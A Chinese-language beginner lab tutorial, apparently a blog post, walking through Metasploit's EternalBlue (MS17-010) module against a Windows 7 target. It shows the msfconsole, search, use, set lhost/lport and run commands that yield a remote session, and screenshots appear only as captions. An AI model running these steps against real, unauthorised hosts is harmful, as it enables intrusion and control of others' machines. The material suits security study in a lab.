网络安全技术新手入门:利用永恒之蓝获取靶机控制权限

目录

前言

一、搜索永恒之蓝可用模块

二、使用攻击模块

三、配置攻击模块

四、攻击

五、总结


前言

相关法律声明:《中华人民共和国网络安全法》第二十七条 任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动;不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序、工具;明知他人从事危害网络安全的活动的,不得为其提供技术支持、广告推广、支付结算等帮助。

本文仅用于学习用途,读者应当不传播病毒以及做一些危害公共安全的行为,若读者利用所学对公共安全产生危害则与本人无关。

准备工作:

1.kali linux 系统        2.Windows7系统        3.保证攻击机与靶机之间能够ping通

步骤总览:

1.找到永恒之蓝可以使用的模块

2.使用永恒之蓝的攻击模块

3.配置永恒之蓝的攻击模块设置

4.攻击

tips:因为win10以上的系统均已打上了永恒之蓝补丁,所以行实验的时候使用win7作为靶机,读者在完成了对win7的权限获取之后,可以尝试同样的步骤对win10以上的系统进行攻击从而体会一下。

一、搜索永恒之蓝可用模块

输入命令:sudo su

网络安全技术新手入门:利用永恒之蓝获取靶机控制权限_第1张图片

输入命令:msfconsole

网络安全技术新手入门:利用永恒之蓝获取靶机控制权限_第2张图片

输入命令:search ms_010

搜索结果:

网络安全技术新手入门:利用永恒之蓝获取靶机控制权限_第3张图片

二、使用攻击模块

输入命令:use ms17_010_eternalblue 或者 use 0

网络安全技术新手入门:利用永恒之蓝获取靶机控制权限_第4张图片

三、配置攻击模块

展示攻击模块的配置项:

输入命令:show options

配置项如下:

网络安全技术新手入门:利用永恒之蓝获取靶机控制权限_第5张图片

正式配置:

输入命令:set lhost 192.168.10.151 以及 set lport 9999

配置结果如下:

网络安全技术新手入门:利用永恒之蓝获取靶机控制权限_第6张图片

四、攻击

输入命令:run

tips:如果读者没有运行成功,那么极有可能是端口被占用了

我在运行的时候没有运行成功,所以将监听端口从9999改为了10000

运行结果如下:

通过help命令可以查看获取权限之后所能够进行的操作:

五、总结

使用msf中的模块功能基本上都分为四大步:

1.找到需要使用的模块

2.使用模块

3.配置模块

4.运行模块

你可能感兴趣的:(网络安全,web安全,安全,网络,网络安全,linux,windows)